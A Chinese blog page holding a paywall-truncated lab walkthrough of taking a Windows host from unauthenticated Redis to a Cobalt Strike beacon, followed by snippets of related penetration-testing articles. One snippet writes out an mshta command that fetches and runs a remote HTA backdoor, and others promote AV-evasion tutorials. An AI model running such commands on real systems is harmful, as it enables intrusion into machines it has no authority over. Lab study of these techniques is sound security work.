记一次实验：redis未授权到cs上线（windows）

最新推荐文章于 2025-11-12 09:55:27 发布

原创

最新推荐文章于 2025-11-12 09:55:27 发布 · 1.4k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#redis #windows #渗透测试 #安全

文章目录

简介
前期准备
攻击步骤

简介

cs服务器：192.168.43.113（kali）
cs客户端兼攻击机：192.168.43.101（win10）
靶机：192.168.43.42（win7）

前期准备

kali搭建cs服务器

sudo ./teamserver 192.168.43.113 yuchi123

在这里插入图片描述

win10启动cs客户端

在这里插入图片描述

探测靶机开放端口

nmap.exe 192.168.43.42 -p 6379

在这里插入图片描述

攻击步骤

nmap探测是否存在redis未授权

nmap探测到redis的信息，说明存在redis未授权漏洞

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

鱼翅的谷仓

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

内网渗透-Windows内网渗透

lza20001103的博客

08-15

2869

内网渗透-Windows内网渗透文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat：SecureCRT：Xshell：WinSCP：VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.

红队内网攻防渗透：内网渗透之内网各种工具平台的使用

HACKONE的博客

04-10

1792

红队内网攻防渗透内网各种工具平台的使用内网各种工具平台的使用

参与评论您还未登录，请先登录后发表或查看评论

免杀制作-教你如何一键制作window-CS上线免杀马（新手推荐）

weixin_42109829的博客

10-20

7911

一、免杀思路应该说每一类型的恶意软件所实施的反检测技术都是不一样的（恶意软件可以分为病毒、木马、僵尸程序、流氓软件、勒索软件、广告程序等），虽然本文会对所有相关的反检测技术都进行介绍，但我们还是会将注意力放在stager阶段的meterpreter这种有效载荷的工具上，因为几乎所有的恶意软件的攻击命令的执行都必须依靠 meterpreter来实施攻击，例如: 提权、凭证窃取、进程迁移、注册表操作和分配更多的后续攻击，另外，MetasploitFramework是一个缓冲区溢出测试使用的辅助工具，也可以说

数据库提权利用

qq_43608955的博客

10-14

1648

0x01 概述该文章文章总结了在国家级攻防演练中数据库相关利用，旨在帮助红队队员在拿下数据库权限后快速获取服务器权限、WEB应用权限、数据，请勿利用。该文章不会将所有的利用方式进行总结，因为有一些利用方式非常鸡肋，需要特别说明，文章总结了在实战中采用的方式并且有益的利用。 0x02 数据库->服务器权限建议大家在实战中直接使用工具，当使用工具遇到问题时可通过以下步骤进行调试网上有成熟的数据库利用工具：https : //github.com/SafeGroceryStore/MDU.

【免费下载】 MDUT - 多数据库利用工具项目推荐

最新发布

gitblog_07776的博客

11-12

815

MDUT（Multiple Database Utilization Tools）是一款中文的数据库跨平台利用工具，集合了多种主流的数据库类型。该项目基于前人SQLTOOLS的基础开发，旨在将常见的数据库利用手段集合在一个程序中，打破各种数据库利用工具需要各种环境导致使用不便的隔阂。MDUT主要使用Java语言开发，并使用JAVAFx作为GUI操作界面，界面美观且易于使用。 ## 2. 项目核心

MDUT，多种数据库综合利用工具。后渗透或者数据库方向的工具

08-04

MDUT，多种数据库综合利用工具。后渗透或者数据库方向的工具

从未授权内网redis到CS上线

pyth0zn的博客

04-18

411

redis，shiro，内网渗透

Redis_CS

KevinJee_

12-03

162

服务器端服务器端的命令为: redis-server 可以使⽤help查看帮助⽂档 redis-server --help 个人习惯 ps aux | grep redis 查看redis服务器进程 sudo kill -9 pid 杀死redis服务器 sudo redis-server /etc/redis/redis.conf 指定加载的配置文件客户端客户端的命令为: redis...

红日七靶场--Writeup

dingxingaq的博客

11-04

1605

目前的权限是www，利用容器操纵实体机修改ssh，进行免密登录所以我们首先得在容器中进行提权。查找有高权限的文件，也就是说这个文件的权限是root，那么通过这个权限调用的任何命令也是 root权限，再修改环境变量，让这个文件调用的命令指向我们写的恶意命令就可以进行提权。

权限提升“小迪安全课堂笔记”后台提权+window提权

weixin_42902126的博客

05-05

3451

权限提升权限提升-基础知识和思路当前知识点在渗透流程中的点当前知识点在权限提升的重点当前知识点权限提升权限介绍利⽤成功后的思路需要总结的思路具体有哪些权限需要我们知道和了解掌握的？权限提升-网站权限后台漏洞第三方获取演示案例某挂壁程序后台权限提升-后台功能某BC广告导航页权限提升-漏洞层面苏丹GlassFish中间件-第三方权限提升-Win 溢出漏洞及 AT&SC&PS 提权案例演示基于 WEB 环境下的权限提升-阿里云靶机windows2012案例总结：基于本地环境下的权限提升-系统溢出漏

csWindows上马

weixin_45682070的博客

12-15

452

设置监听生成http application后门选择powershell脚本然后把生成的evil.hta文件上传到cs服务器上这时已经挂在cs服务器/download目录下如果有命令执行漏洞，执行mshta+刚才生成的路径 mshta http://192.168.17.181:80/download/file.ext 然后就获得一个shell，只适用win ......

Windows提权_CS提权上线。

weixin_39953838的博客

01-04

2440

许多过往之人事，可想可念不可急。

文件cs上线主机及攻击使用ping工具

weixin_51387754的博客

05-05

672

Hancitor’s Use of Cobalt Strike and a Noisy Network Ping Tool 执行摘要 Hancitor是一种信息窃取程序和恶意软件下载程序，被指定为MAN1，Moskalvzapoe或TA511的威胁参与者使用。在2018年的威胁简介中，我们指出Hancitor相对不成熟，但在未来数年中仍将是威胁。大约三年后，Hancitor仍然是一种威胁，并且已经演变为使用Cobalt Strike之类的工具。最近几个月，该参与者开始使用网络ping工具来帮助枚举受感染主机

redis未授权访问--覆盖windows版本以及linux版本

markecheng的博客

10-21

1073

我又回来了，之前一段时间忙于升学，以及离职这些事，所以停更了，现在好了^ ^ 一、漏洞简介 redis是一个开源的数据库。并且目前在很多方面都会使用到redis，但是redis因为配置不当，可以产生未授权访问漏洞，redis未授权访问漏洞利用方式很多，可以写入webshell，或者拿主机权限（上线cs）等等，以下我们降价windows版本以及linux版本redis常用的利用方式二、利用方式 windows版：上线cs拿主机权限 linux版本：给root账户写入SSH公钥文件，直接通过SSH免密码登

内网渗透-cobaltstrike之cs上线获取shell

lza20001103的博客

04-30

9326

cobaltstrike之cs上线获取shell

CS木马的几种上线方式总结